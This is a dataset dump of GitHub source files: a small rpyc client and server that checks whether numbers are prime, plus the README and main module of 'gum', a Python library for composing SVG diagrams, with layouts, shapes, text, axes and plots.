"content_id": "9cb947b42bdde99399bec9b46514c7be48798062",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1159,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 51,
"path": "/PrimeService.py",
"repo_name": "blueitem/PrimeTestService",
"src_encoding": "UTF-8",
"text": "\"\"\" \n Prime Service for Server, connects on port 12345\n PrimeService is a class that checks whether a number is a Prime number or not.\n\n (Python 3.4.2)\n \n Author: Jovaughn Chin\n Jonathan Gonzoph\n\n Date: 11/13/2014\n\n\"\"\"\n\n#import statement, math for sqrt in checkPrime, rpyc for connection\nimport math\nimport rpyc\n\n\nclass PrimeService(rpyc.Service):\n\n\n #unused\n def on_connect(self):\n # code that runs when a connection is created\n # (to init the service, if needed)\n pass\n #unused\n def on_disconnect(self):\n # code that runs when the connection has already closed\n # (to finalize the service, if needed)\n pass\n\n #given an integer, checks whether that integer is prime and returns true or false\n def exposed_isPrime(self,number):\n\n\n if number < 2:\n return False\n\n for i in range(2,int(math.sqrt(number)+1)):\n if (number % i) == 0:\n return False\n return True\n\n#starts the service on port 12345\nfrom rpyc.utils.server import ThreadedServer\n\nif __name__ == \"__main__\":\n \n t = ThreadedServer(PrimeService, port = 12345)\n t.start()"
},
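rpyc strips the `exposed_` prefix when the client goes through the connection's root proxy, which is why the method is declared as `exposed_isPrime`. A minimal client session against the server above; `localhost` is an assumption, while the port is the one hard-coded in PrimeService.py:

```python
import rpyc

# connect to the ThreadedServer started by PrimeService.py
conn = rpyc.connect("localhost", 12345)
print(conn.root.isPrime(17))  # exposed_isPrime is reached as root.isPrime -> True
print(conn.root.isPrime(18))  # -> False
conn.close()
```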
{
"alpha_fraction": 0.6992385983467102,
"alphanum_fraction": 0.7195431590080261,
"avg_line_length": 21.457143783569336,
"blob_id": "4e8d707ee92e8c2aedef016f0ff145a0d849d21d",
"content_id": "b1d910cc67b50730732a4c548716e7c2b1d893e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 788,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 35,
"path": "/PrimeClient.py",
"repo_name": "blueitem/PrimeTestService",
"src_encoding": "UTF-8",
"text": "\"\"\" RPyc Client\n\n(Python 3.4.2)\n\nAuthor: Jovaughn Chin\n Jonathan Gonzoph\nDate: 11/17/2014\n\n\"\"\"\n\n\n# import rpyc for connection, ipaddress for IP validation\nimport rpyc\nimport ipaddress\n\n#ask Client the location/server of the Service he wish to access\nIPAddress= input(\" What is the location(IP) of the server you wish to access?: \")\n\n#Validate IP address\ntry:\n ipaddress.ip_address(IPAddress)\n\nexcept ValueError:\n\tIPAddress=input(\"Sorry, wrong input. Please input correct location(IP) of the server you wish to access?: \")\n\n# connect to server\nc=rypc.connect(IPAddress,12345) \n\n# validate input is a number\ntry:\n\tnum=int(input(\"What number would you like to check if prime?: \" ))\nexcept ValueError:\n num = int(input(\"Sorry, wrong input. Please input a number: \"))\n\nprint(c.root.isPrime(num))\n\n\n"
}
] | 3 |
iamlemec/gum | https://github.com/iamlemec/gum | cb418986b8b21c33544ad5b4618130c023c8107a | 599bec120bbf9ee0a2b200871ee3dec21015b121 | cdd09c338608214f58f5683cba0daf12499c8cd8 | refs/heads/main | 2023-06-27T23:01:00.160082 | 2021-07-30T03:59:14 | 2021-07-30T03:59:14 | 356751393 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.675000011920929,
"alphanum_fraction": 0.675000011920929,
"avg_line_length": 16.14285659790039,
"blob_id": "cb102922e88a2e53fb5745da0ac96964915f1ae6",
"content_id": "3768ce066d88021e1dbc7a083f1da24e9d850376",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 120,
"license_type": "permissive",
"max_line_length": 42,
"num_lines": 7,
"path": "/README.md",
"repo_name": "iamlemec/gum",
"src_encoding": "UTF-8",
"text": "<div align=\"center\">\n<img src=\"gum.svg\" alt=\"gum logo\"></img>\n</div>\n\n# gum\n\nGrammar for SVG diagram creation in Python\n"
},
{
"alpha_fraction": 0.5024194717407227,
"alphanum_fraction": 0.520240306854248,
"avg_line_length": 28.148832321166992,
"blob_id": "9dbe7bd190a006a076d0a89e0161c4b327af0163",
"content_id": "906fb60f8fa5846a7120ceff354e9355697dc9de",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 29971,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 1028,
"path": "/gum/gum.py",
"repo_name": "iamlemec/gum",
"src_encoding": "UTF-8",
"text": "################################\n## gum — an svg diagram maker ##\n################################\n\nimport os\nimport copy\nimport numpy as np\nfrom collections import defaultdict\nfrom math import sqrt, tan, pi, inf, isinf\n\nfrom .fonts import get_text_size, get_text_shape\n\n##\n## defaults\n##\n\n# namespace\nns_svg = 'http://www.w3.org/2000/svg'\n\n# sizing\nsize_base = 250\nrect_base = (0, 0, 100, 100)\nfrac_base = (0, 0, 1, 1)\nprec_base = 13\n\n# specific elements\ndefault_tick_size = 0.05\ndefault_nticks = 5\ndefault_font_family = 'Montserrat'\ndefault_emoji_font = 'NotoColorEmoji'\ndefault_font_weight = 'Regular'\n\n##\n## basic tools\n##\n\ndef demangle(k):\n return k.replace('_', '-')\n\ndef rounder(x, prec=prec_base):\n if type(x) is str and x.endswith('px'):\n x1 = x[:-2]\n if x1.replace('.', '', 1).isnumeric():\n suf = 'px'\n x = float(x1)\n else:\n suf = ''\n if isinstance(x, (float, np.floating)):\n xr = round(x, ndigits=prec)\n if (xr % 1) == 0:\n ret = int(xr)\n else:\n ret = xr\n else:\n ret = x\n return str(ret) + suf\n\ndef props_repr(d, prec=prec_base):\n return ' '.join([\n f'{demangle(k)}=\"{rounder(v, prec=prec)}\"' for k, v in d.items()\n ])\n\ndef value_repr(x):\n if type(x) is str:\n return f'\"{x}\"'\n else:\n return x\n\ndef rule_repr(d, tab=4*' '):\n return '\\n'.join([f'{tab}{demangle(k)}: {value_repr(v)};' for k, v in d.items()])\n\ndef style_repr(d):\n return '\\n\\n'.join([\n tag + ' {\\n' + rule_repr(rules) + '\\n}' for tag, rules in d.items()\n ])\n\ndef dispatch(d, keys):\n rest = {}\n subs = defaultdict(dict)\n for k, v in d.items():\n for s in keys:\n if k.startswith(f'{s}_'):\n k1 = k[len(s)+1:]\n subs[s][k1] = v\n else:\n rest[k] = v\n return rest, *[subs[s] for s in keys]\n\ndef prefix(d, pre):\n return {f'{pre}_{k}': v for k, v in d.items()}\n\ndef dedict(d, default=None):\n if type(d) is dict:\n d = [(k, v) for k, v in d.items()]\n return [\n (x if type(x) is tuple else (x, default)) for x in d\n ]\n\ndef cumsum(a, zero=True):\n s = 0\n c = [0] if zero else []\n for x in a:\n s += x\n c.append(s)\n return c\n\n##\n## rect tools\n##\n\ndef pos_rect(r):\n if r is None:\n return frac_base\n elif type(r) is not tuple:\n return (0, 0, r, r)\n elif len(r) == 2:\n rx, ry = r\n return (0, 0, rx, ry)\n else:\n return r\n\ndef pad_rect(p, base=frac_base):\n xa, ya, xb, yb = base\n if p is None:\n return base\n elif type(p) is not tuple:\n return (xa+p, ya+p, xb-p, yb-p)\n elif len(p) == 2:\n px, py = p\n return (xa+px, ya+py, xb-px, yb-py)\n else:\n pxa, pya, pxb, pyb = p\n return (xa+pxa, ya+pya, xb-pxb, yb-pyb)\n\ndef rad_rect(p, default=None):\n if len(p) == 1:\n r, = p\n x, y = 0.5, 0.5\n rx, ry = r, r\n elif len(p) == 2:\n x, y = p\n rx, ry = default, default\n elif len(p) == 3:\n x, y, r = p\n rx, ry = r, r\n elif len(p) == 4:\n x, y, rx, ry = p\n return (x-rx, y-ry, x+rx, y+ry)\n\ndef merge_rects(rects):\n xa, ya, xb, yb = zip(*rects)\n return min(xa), min(ya), max(xb), max(yb)\n\ndef rect_dims(rect):\n xa, ya, xb, yb = rect\n w, h = xb - xa, yb - ya\n return w, h\n\ndef rect_aspect(rect):\n w, h = rect_dims(rect)\n return w/h\n\n##\n## context\n##\n\n# prect — outer rect (absolute)\n# frect — inner rect (fraction)\ndef map_coords(prect, frect=frac_base, aspect=None):\n pxa, pya, pxb, pyb = prect\n fxa, fya, fxb, fyb = frect\n\n pw, ph = pxb - pxa, pyb - pya\n fw, fh = fxb - fxa, fyb - fya\n\n pxa1, pya1 = pxa + fxa*pw, pya + fya*ph\n pxb1, pyb1 = pxa + fxb*pw, pya + fyb*ph\n\n if aspect is not None:\n pw1, ph1 = fw*pw, fh*ph\n asp1 = 
pw1/ph1\n\n if asp1 == aspect: # just right\n pass\n elif asp1 > aspect: # too wide\n pw2 = aspect*ph1\n dpw = pw1 - pw2\n pxa1 += 0.5*dpw\n pxb1 -= 0.5*dpw\n elif asp1 < aspect: # too tall\n ph2 = pw1/aspect\n dph = ph2 - ph1\n pya1 -= 0.5*dph\n pyb1 += 0.5*dph\n\n return pxa1, pya1, pxb1, pyb1\n\nclass Context:\n def __init__(self, rect=rect_base, prec=prec_base, **kwargs):\n self.rect = rect\n self.prec = prec\n for k, v in kwargs.items():\n setattr(self, k, v)\n\n def __repr__(self):\n return str(self.__dict__)\n\n def __call__(self, rect, aspect=None):\n rect1 = map_coords(self.rect, rect, aspect=aspect)\n ctx = self.copy()\n ctx.rect = rect1\n return ctx\n\n def clone(self, **kwargs):\n kwargs1 = self.__dict__ | kwargs\n return Context(**kwargs1)\n\n def copy(self):\n return copy.copy(self)\n\n def deepcopy(self):\n return copy.deepcopy(self)\n\n##\n## core types\n##\n\nclass Element:\n def __init__(self, tag, unary=False, aspect=None, **attr):\n self.tag = tag\n self.unary = unary\n self.aspect = aspect\n self.attr = attr\n\n def __repr__(self):\n attr = props_repr(self.attr)\n return f'{self.tag}: {attr}'\n\n def __add__(self, other):\n return Container([self, other])\n\n def __or__(self, other):\n return HStack([self, other], expand=True)\n\n def __xor__(self, other):\n return HStack([self, other], expand=False)\n\n def __and__(self, other):\n return VStack([self, other], expand=True)\n\n def __mul__(self, other):\n return VStack([self, other], expand=False)\n\n def _repr_svg_(self):\n frame = Frame(self, padding=0.01)\n return SVG(frame).svg()\n\n def props(self, ctx):\n return self.attr\n\n def inner(self, ctx):\n return ''\n\n def svg(self, ctx=None, prec=prec_base):\n if ctx is None:\n ctx = Context(prec=prec)\n\n props = props_repr(self.props(ctx), prec=ctx.prec)\n pre = ' ' if len(props) > 0 else ''\n\n if self.unary:\n return f'<{self.tag}{pre}{props} />'\n else:\n inner = self.inner(ctx)\n return f'<{self.tag}{pre}{props}>{inner}</{self.tag}>'\n\n def save(self, fname, **kwargs):\n SVG(self, **kwargs).save(fname)\n\nclass Container(Element):\n def __init__(self, children=None, tag='g', **attr):\n super().__init__(tag=tag, **attr)\n if children is None:\n children = []\n if isinstance(children, dict):\n children = [(c, r) for c, r in children.items()]\n if not isinstance(children, list):\n children = [children]\n children = [\n (c if type(c) is tuple else (c, None)) for c in children\n ]\n children = [(c, pos_rect(r)) for c, r in children]\n self.children = children\n\n def inner(self, ctx):\n inside = '\\n'.join([c.svg(ctx(r, c.aspect)) for c, r in self.children])\n return f'\\n{inside}\\n'\n\n# this can have an aspect, which is utilized by layouts\nclass Spacer(Element):\n def __init__(self, aspect=None, **attr):\n super().__init__(tag=None, aspect=aspect, **attr)\n\n def svg(self, ctx=None):\n return ''\n\nclass SVG(Container):\n def __init__(self, children=None, size=size_base, clip=True, **attr):\n if children is not None and not isinstance(children, (list, dict)):\n children = [children]\n super().__init__(children=children, tag='svg', **attr)\n\n if clip:\n ctx = Context(rect=(0, 0, 1, 1))\n rects = [ctx(r, aspect=c.aspect).rect for c, r in self.children]\n total = merge_rects(rects)\n aspect = rect_aspect(total)\n else:\n aspect = 1\n\n if type(size) is not tuple:\n if aspect >= 1:\n size = size, size/aspect\n else:\n size = size*aspect, size\n\n self.size = size\n\n def _repr_svg_(self):\n return self.svg()\n\n def props(self, ctx):\n w, h = self.size\n base = 
dict(width=w, height=h, xmlns=ns_svg)\n return base | self.attr\n\n def svg(self, prec=prec_base):\n rect0 = (0, 0) + self.size\n ctx = Context(rect=rect0, prec=prec)\n return Element.svg(self, ctx=ctx)\n\n def save(self, path):\n s = self.svg()\n with open(path, 'w+') as fid:\n fid.write(s)\n\n##\n## layouts\n##\n\nclass Box(Container):\n def __init__(self, children, aspect=None, **attr):\n super().__init__(children=children, aspect=aspect, **attr)\n\nclass Frame(Container):\n def __init__(self, child, padding=0, margin=0, border=None, aspect=None, **attr):\n mrect = pad_rect(margin)\n prect = pad_rect(padding)\n trect = pad_rect(padding, base=mrect)\n\n children = []\n\n if border is not None:\n attr, rect_args = dispatch(attr, ['rect'])\n if aspect is None and child.aspect is not None:\n pw, ph = rect_dims(prect)\n raspect = child.aspect*(ph/pw)\n else:\n raspect = aspect\n rect = Rect(stroke_width=border, aspect=raspect, **rect_args)\n children += [(rect, mrect)]\n\n children += [(child, trect)]\n\n if aspect is None and child.aspect is not None:\n tw, th = rect_dims(trect)\n aspect = child.aspect*(th/tw)\n\n super().__init__(children=children, aspect=aspect, **attr)\n\nclass Point(Container):\n def __init__(self, child, x=0.5, y=0.5, r=0.5, aspect=None, **attr):\n if type(r) is not tuple:\n r = r,\n pos = x, y, *r\n aspect = child.aspect if aspect is None else aspect\n children = [(child, rad_rect(pos))]\n super().__init__(children=children, aspect=aspect, **attr)\n\nclass Scatter(Container):\n def __init__(self, locs, r=None, **attr):\n locs = dedict(locs)\n children = [\n (child, rad_rect(pos, default=r)) for child, pos in locs\n ]\n super().__init__(children=children, **attr)\n\nclass VStack(Container):\n def __init__(self, children, expand=True, aspect=None, **attr):\n n = len(children)\n children, heights = zip(*dedict(children, 1/n))\n aspects = [c.aspect for c in children]\n\n if expand:\n heights = [h/(a or 1) for h, a in zip(heights, aspects)]\n total = sum(heights)\n heights = [h/total for h in heights]\n\n cheights = cumsum(heights)\n children = [\n (c, (0, fh0, 1, fh1)) for c, fh0, fh1 in zip(children, cheights[:-1], cheights[1:])\n ]\n\n aspects0 = [h*a for h, a in zip(heights, aspects) if a is not None]\n aspect0 = max(aspects0) if len(aspects0) > 0 else None\n aspect = aspect0 if aspect is None else aspect\n\n super().__init__(children=children, aspect=aspect, **attr)\n\nclass HStack(Container):\n def __init__(self, children, expand=True, aspect=None, **attr):\n n = len(children)\n children, widths = zip(*dedict(children, 1/n))\n aspects = [c.aspect for c in children]\n\n if expand:\n widths = [w*(a or 1) for w, a in zip(widths, aspects)]\n total = sum(widths)\n widths = [w/total for w in widths]\n\n cwidths = cumsum(widths)\n children = [\n (c, (fw0, 0, fw1, 1)) for c, fw0, fw1 in zip(children, cwidths[:-1], cwidths[1:])\n ]\n\n aspects0 = [a/w for w, a in zip(widths, aspects) if a is not None]\n aspect0 = min(aspects0) if len(aspects0) > 0 else None\n aspect = aspect0 if aspect is None else aspect\n\n super().__init__(children=children, aspect=aspect, **attr)\n\n# TODO\nclass Grid:\n pass\n\n##\n## geometric\n##\n\nclass Ray(Element):\n def __init__(self, theta=-45, **attr):\n if theta == -90:\n theta = 90\n elif theta < -90 or theta > 90:\n theta = ((theta + 90) % 180) - 90\n direc0 = tan(theta*(pi/180))\n\n if theta == 90:\n direc = inf\n aspect = None\n elif theta == 0:\n direc = 0\n aspect = None\n else:\n direc = direc0\n aspect = 1/abs(direc0)\n\n attr1 = 
dict(stroke='black') | attr\n super().__init__(tag='line', aspect=aspect, unary=True, **attr1)\n self.direc = direc\n\n def props(self, ctx):\n x1, y1, x2, y2 = ctx.rect\n w, h = x2 - x1, y2 - y1\n if isinf(self.direc):\n x1 = x2 = x1 + 0.5*w\n elif self.direc == 0:\n y1 = y2 = y1 + 0.5*h\n elif self.direc > 0:\n y1, y2 = y2, y1\n base = dict(x1=x1, y1=y1, x2=x2, y2=y2)\n return base | self.attr\n\nclass VLine(Element):\n def __init__(self, pos=0.5, aspect=None, **attr):\n attr1 = dict(stroke='black') | attr\n super().__init__(tag='line', unary=True, aspect=aspect, **attr1)\n self.pos = pos\n\n def props(self, ctx):\n x1, y1, x2, y2 = ctx.rect\n w, h = x2 - x1, y2 - y1\n\n x1 = x2 = x1 + self.pos*w\n\n base = dict(x1=x1, y1=y1, x2=x2, y2=y2)\n return base | self.attr\n\nclass HLine(Element):\n def __init__(self, pos=0.5, aspect=None, **attr):\n attr1 = dict(stroke='black') | attr\n super().__init__(tag='line', unary=True, aspect=aspect, **attr1)\n self.pos = pos\n\n def props(self, ctx):\n x1, y1, x2, y2 = ctx.rect\n w, h = x2 - x1, y2 - y1\n\n y1 = y2 = y1 + self.pos*h\n\n base = dict(x1=x1, y1=y1, x2=x2, y2=y2)\n return base | self.attr\n\nclass Rect(Element):\n def __init__(self, **attr):\n attr1 = dict(fill='none', stroke='black') | attr\n super().__init__(tag='rect', unary=True, **attr1)\n\n def props(self, ctx):\n x1, y1, x2, y2 = ctx.rect\n w0, h0 = x2 - x1, y2 - y1\n\n x, y = x1, y1\n w, h = w0, h0\n\n base = dict(x=x, y=y, width=w, height=h)\n return base | self.attr\n\nclass Square(Rect):\n def __init__(self, **attr):\n super().__init__(aspect=1, **attr)\n\nclass Ellipse(Element):\n def __init__(self, **attr):\n attr1 = dict(fill='none', stroke='black') | attr\n super().__init__(tag='ellipse', unary=True, **attr1)\n\n def props(self, ctx):\n x1, y1, x2, y2 = ctx.rect\n w, h = x2 - x1, y2 - y1\n\n cx = x1 + 0.5*w\n cy = y1 + 0.5*h\n rx = 0.5*w\n ry = 0.5*h\n\n base = dict(cx=cx, cy=cy, rx=rx, ry=ry)\n return base | self.attr\n\nclass Circle(Ellipse):\n def __init__(self, **attr):\n super().__init__(aspect=1, **attr)\n\nclass Bullet(Circle):\n def __init__(self, **attr):\n attr1 = dict(fill='black') | attr\n super().__init__(**attr1)\n\n##\n## text\n##\n\ndef weight_map(x):\n if type(x) is str:\n if x == 'light':\n return 'Light', 200\n elif x == 'Bold':\n return 'Bold', 700\n else:\n return 'Regular', 400\n elif type(x) is int:\n if x <= 300:\n return 'Light', x\n elif x <= 550:\n return 'Regular', x\n else:\n return 'Bold', x\n else:\n return 'Regular', 400\n\nclass Text(Element):\n def __init__(\n self, text='', font_family=default_font_family,\n font_weight=default_font_weight, **attr\n ):\n str_weight, num_weight = weight_map(font_weight)\n\n self.text_width, self.text_height = get_text_size(\n text, font=font_family, weight=str_weight\n )\n self.text = text\n\n base_aspect = self.text_width/self.text_height\n super().__init__(\n tag='text', aspect=base_aspect, font_family=font_family,\n font_weight=num_weight, **attr\n )\n\n def props(self, ctx):\n x1, y1, x2, y2 = ctx.rect\n w, h = x2 - x1, y2 - y1\n\n fs = h/self.text_height\n\n base = dict(x=x1, y=y2, font_size=f'{fs}px', stroke='black')\n return base | self.attr\n\n def inner(self, ctx):\n return self.text\n\nclass Emoji(Element):\n def __init__(self, text='', font_family=default_emoji_font, **attr):\n self.text_width, self.text_height = get_text_size(text, font=font_family)\n self.text = text\n\n base_aspect = self.text_width/self.text_height\n super().__init__(tag='text', aspect=base_aspect, font_family=font_family, 
**attr)\n\n    def props(self, ctx):\n        x1, y1, x2, y2 = ctx.rect\n        w, h = x2 - x1, y2 - y1\n        fs = h/self.text_height\n\n        # magic offsets\n        x0, y0 = x1, y2 - 0.125*h\n        fs0 = 1.25*fs\n\n        base = dict(x=x0, y=y0, font_size=f'{fs0}px', stroke='black')\n        return base | self.attr\n\n    def inner(self, ctx):\n        return self.text\n\nclass TextDebug(Container):\n    def __init__(self, text='', font_family=default_font_family, **attr):\n        label = Text(text=text, font_family=font_family, **attr)\n        boxes = Rect(stroke='red')\n        outer = Rect(stroke='blue', stroke_dasharray='5 5')\n\n        # mimic regular Text\n        self.text_width = label.text_width\n        self.text_height = label.text_height\n\n        # get full font shaping info\n        cluster, shapes, deltas, offsets = get_text_shape(text, font=font_family)\n        shapes = [(w, h) for w, h in shapes]\n        deltas = [(w, -h) for w, h in deltas]\n\n        # compute character boxes\n        if len(deltas) == 0:\n            crects = []\n        else:\n            tw, th = self.text_width, self.text_height\n            cumdel = [(0, 0)] + [tuple(x) for x in np.cumsum(deltas[:-1], axis=0)]\n            dshapes = [(dx, sy) for (dx, _), (_, sy) in zip(deltas, shapes)]\n            rects = [(cx, cy, cx+dx, cy+dy) for (cx, cy), (dx, dy) in zip(cumdel, dshapes)]\n            crects = [(x1/tw, 1-y2/th, x2/tw, 1-y1/th) for x1, y1, x2, y2 in rects]\n\n        # render proportionally\n        children = [label]\n        children += [(boxes, tuple(frac)) for frac in crects]\n        children += [outer]\n\n        super().__init__(children=children, aspect=label.aspect, **attr)\n\nclass Node(Container):\n    def __init__(self, text, padding=0.2, shape=Rect, debug=False, **attr):\n        attr, text_args, shape_args = dispatch(attr, ['text', 'shape'])\n\n        # generate core elements\n        if type(text) is str:\n            TextClass = TextDebug if debug else Text\n            text = TextClass(text=text, **text_args)\n        outer = shape(**shape_args)\n\n        # auto-scale single number padding\n        aspect0 = text.aspect\n        if type(padding) is not tuple:\n            padding = padding/aspect0, padding\n        aspect1 = (aspect0+2*padding[0])/(1+2*padding[1])\n\n        children = {\n            text: pad_rect(padding),\n            outer: None\n        }\n\n        super().__init__(children=children, aspect=aspect1, **attr)\n\n##\n## curves\n##\n\nclass Polygon(Element):\n    def __init__(self, points, **attr):\n        self.points = points\n        super().__init__(tag='polygon', unary=True, **attr)\n\n    def props(self, ctx):\n        x1, y1, x2, y2 = ctx.rect\n        w, h = x2 - x1, y2 - y1\n\n        pc = [(x1 + fx*w, y1 + fy*h) for fx, fy in self.points]\n        points = ' '.join([f'{x},{y}' for x, y in pc])\n\n        base = dict(points=points, fill='none', stroke='black')\n        return base | self.attr\n\nclass SymPath(Element):\n    def __init__(self, fy=None, fx=None, xlim=None, ylim=None, tlim=None, N=100, **attr):\n        super().__init__(tag='polyline', unary=True, **attr)\n\n        if fx is not None and fy is not None:\n            tvals = np.linspace(*tlim, N)\n            if type(fx) is str:\n                xvals = eval(fx, {'t': tvals})\n            else:\n                xvals = fx(tvals)\n            if type(fy) is str:\n                yvals = eval(fy, {'t': tvals})\n            else:\n                yvals = fy(tvals)\n            xvals *= np.ones_like(tvals)\n            yvals *= np.ones_like(tvals)\n        elif fy is not None:\n            xvals = np.linspace(*xlim, N)\n            if type(fy) is str:\n                yvals = eval(fy, {'x': xvals})\n            else:\n                yvals = fy(xvals)\n            yvals *= np.ones_like(xvals)\n        elif fx is not None:\n            yvals = np.linspace(*ylim, N)\n            if type(fx) is str:\n                xvals = eval(fx, {'y': yvals})\n            else:\n                xvals = fx(yvals)\n            xvals *= np.ones_like(yvals)\n        else:\n            raise Exception('Must specify either fx or fy')\n\n        if xlim is None:\n            self.xlim = np.min(xvals), np.max(xvals)\n        else:\n            self.xlim = xlim\n        if ylim is None:\n            self.ylim = 
np.min(yvals), np.max(yvals)\n else:\n self.ylim = ylim\n\n xmin, xmax = self.xlim\n ymin, ymax = self.ylim\n xrange = xmax - xmin\n yrange = ymax - ymin\n\n self.xnorm = (xvals-xmin)/xrange if xrange != 0 else 0.5*np.ones_like(xvals)\n self.ynorm = (ymax-yvals)/yrange if yrange != 0 else 0.5*np.ones_like(yvals)\n\n def props(self, ctx):\n x1, y1, x2, y2 = ctx.rect\n w, h = x2 - x1, y2 - y1\n\n xc = x1 + self.xnorm*w\n yc = y1 + self.ynorm*h\n points = ' '.join([f'{x},{y}' for x, y in zip(xc, yc)])\n\n base = dict(points=points, fill='none', stroke='black')\n return base | self.attr\n\n##\n## axes\n##\n\nclass HTick(Container):\n def __init__(self, text, thick=1, pad=0.5, text_scale=1, debug=False, **attr):\n attr, text_args = dispatch(attr, ['text'])\n\n if 'font_weight' not in text_args:\n text_args['font_weight'] = 'light'\n\n line = HLine(stroke_width=thick)\n\n if text is None or (type(text) is str and len(text) == 0):\n aspect = 1\n anchor = 0.5\n pad = 0\n children = [line]\n else:\n TextClass = TextDebug if debug else Text\n text = TextClass(text, **text_args) if type(text) is str else text\n tsize = text.aspect*text_scale\n\n width = tsize + pad + 1\n height = text_scale\n aspect = width/height\n anchor = 1 - 0.5/width\n\n children = {\n text: (0, 0, tsize/width, 1),\n line: ((tsize+pad)/width, 0, 1, 1)\n }\n\n super().__init__(children=children, aspect=aspect, **attr)\n self.anchor = anchor\n self.width = width\n self.height = height\n\nclass VTick(Container):\n def __init__(self, text, thick=1, pad=0.5, text_scale=1, debug=False, **attr):\n attr, text_args = dispatch(attr, ['text'])\n\n if 'font_weight' not in text_args:\n text_args['font_weight'] = 'light'\n\n line = VLine(stroke_width=thick)\n\n if text is None or (type(text) is str and len(text) == 0):\n aspect = 1\n anchor = 0.5\n pad = 0\n children = [line]\n else:\n TextClass = TextDebug if debug else Text\n text = TextClass(text, **text_args) if type(text) is str else text\n taspect = text.aspect*text_scale\n\n width = taspect\n height = 1 + pad + text_scale\n aspect = width/height\n anchor = 1 - 0.5/height\n\n children = {\n line: (0, 0, 1, 1/height),\n text: (0, (1+pad)/height, 1, 1)\n }\n\n super().__init__(children=children, aspect=aspect, **attr)\n self.anchor = anchor\n self.width = width\n self.height = height\n\nclass VScale(Container):\n def __init__(self, ticks, tick_size=default_tick_size, tick_args={}, **attr):\n if type(ticks) is dict:\n ticks = [(k, v) for k, v in ticks.items()]\n\n elems = [HTick(s, **tick_args) for _, s in ticks]\n locs = [x for x, _ in ticks]\n\n # aspect per tick and overall\n width0 = max([e.width for e in elems]) if len(elems) > 0 else 1\n aspect0 = max([e.aspect for e in elems]) if len(elems) > 0 else 1\n aspect = width0/(1/tick_size)\n\n # middle of the tick (fractional)\n anchor = (width0-0.5)/width0\n\n children = {\n e: (1-e.width/width0, 1-(x-tick_size/2), 1, 1-(x+tick_size/2))\n for e, x in zip(elems, locs)\n }\n\n super().__init__(children=children, aspect=aspect, **attr)\n self.anchor = anchor\n\nclass HScale(Container):\n def __init__(self, ticks, tick_size=default_tick_size, tick_args={}, **attr):\n if type(ticks) is dict:\n ticks = [(k, v) for k, v in ticks.items()]\n\n elems = [VTick(s, **tick_args) for _, s in ticks]\n locs = [x for x, _ in ticks]\n\n # aspect per tick and overall\n height0 = max([e.height for e in elems]) if len(elems) > 0 else 1\n aspect0 = max([e.aspect for e in elems]) if len(elems) > 0 else 1\n aspect = (1/tick_size)/height0\n\n # middle of the tick 
(fractional)\n anchor = 0.5/height0\n\n children = {\n e: (x-e.aspect/aspect/2, 1-e.height/height0, x+e.aspect/aspect/2, 1)\n for e, x in zip(elems, locs)\n }\n\n super().__init__(children=children, aspect=aspect, **attr)\n self.anchor = anchor\n\nclass VAxis(Container):\n def __init__(self, ticks, tick_size=default_tick_size, **attr):\n attr, tick_args = dispatch(attr, ['tick'])\n scale = VScale(ticks, tick_size=tick_size, tick_args=tick_args)\n line = VLine(scale.anchor)\n super().__init__(children=[scale, line], aspect=scale.aspect, **attr)\n self.anchor = scale.anchor\n\nclass HAxis(Container):\n def __init__(self, ticks, tick_size=default_tick_size, **attr):\n attr, tick_args = dispatch(attr, ['tick'])\n scale = HScale(ticks, tick_size=tick_size, tick_args=tick_args)\n line = HLine(scale.anchor)\n super().__init__(children=[scale, line], aspect=scale.aspect, **attr)\n self.anchor = scale.anchor\n\nclass Axes(Container):\n def __init__(self, xticks=[], yticks=[], aspect=None, **attr):\n attr, xaxis_args, yaxis_args = dispatch(attr, ['xaxis', 'yaxis'])\n\n # adjust tick_size for aspect\n if aspect is not None:\n xtick_size = xaxis_args.get('tick_size', default_tick_size)\n ytick_size = yaxis_args.get('tick_size', default_tick_size)\n xaxis_args['tick_size'] = xtick_size/sqrt(aspect)\n yaxis_args['tick_size'] = ytick_size*sqrt(aspect)\n\n if xticks is not None:\n xaxis = HAxis(xticks, **xaxis_args)\n fx = 1 - xaxis.anchor\n ax0 = xaxis.aspect\n else:\n xaxis = None\n fx = 1\n ax0 = 1\n\n if yticks is not None:\n yaxis = VAxis(yticks, **yaxis_args)\n fy = yaxis.anchor\n ay0 = yaxis.aspect\n else:\n yaxis = None\n fy = 1\n ay0 = 0\n\n # sans anchor aspects\n ax1 = ax0/fx\n ay1 = fy*ay0\n\n # square aspect?\n aspect0 = ax1*(1+ay1)/(1+ax1)\n aspect = aspect0 if aspect is None else aspect\n\n # constraints\n # 1: a0 = fy*wy + wx\n # 2: 1 = hy + fx*hx\n # 3: ax = wx/hx\n # 4: ay = wy/hy\n\n # get axes sizes\n hy = (ax1-aspect)/(ax1-ay1)\n wy = ay0*hy/aspect\n hx = (1-hy)/fx\n wx = ax0*hx/aspect\n\n # compute anchor point\n cx = fy*wy\n cy = 1 - fx*hx\n\n children = {}\n if xaxis is not None:\n children[xaxis] = (1-wx, 1-hx, 1, 1)\n if yaxis is not None:\n children[yaxis] = (0, 0, wy, hy)\n\n super().__init__(children=children, aspect=aspect, **attr)\n self.anchor = cx, cy\n\nclass Plot(Container):\n def __init__(self, lines, xlim=None, ylim=None, xticks=None, yticks=None, aspect=None, **attr):\n attr, xaxis_args, yaxis_args = dispatch(attr, ['xaxis', 'yaxis'])\n\n # allow singleton lines\n if type(lines) is not list:\n lines = [lines]\n\n # collect line ranges\n xmins, xmaxs = zip(*[c.xlim for c in lines])\n ymins, ymaxs = zip(*[c.ylim for c in lines])\n\n # determine coordinate limits\n if xlim is None:\n xmin, xmax = min(xmins), max(xmaxs)\n else:\n xmin, xmax = xlim\n if ylim is None:\n ymin, ymax = min(ymins), max(ymaxs)\n else:\n ymin, ymax = ylim\n\n # x/y coordinate functions\n xmap = lambda x: (x-xmin)/(xmax-xmin)\n ymap = lambda y: (y-ymin)/(ymax-ymin)\n\n # map lines into coordinates\n coords = [\n (xmap(x1), 1-ymap(y2), xmap(x2), 1-ymap(y1))\n for x1, x2, y1, 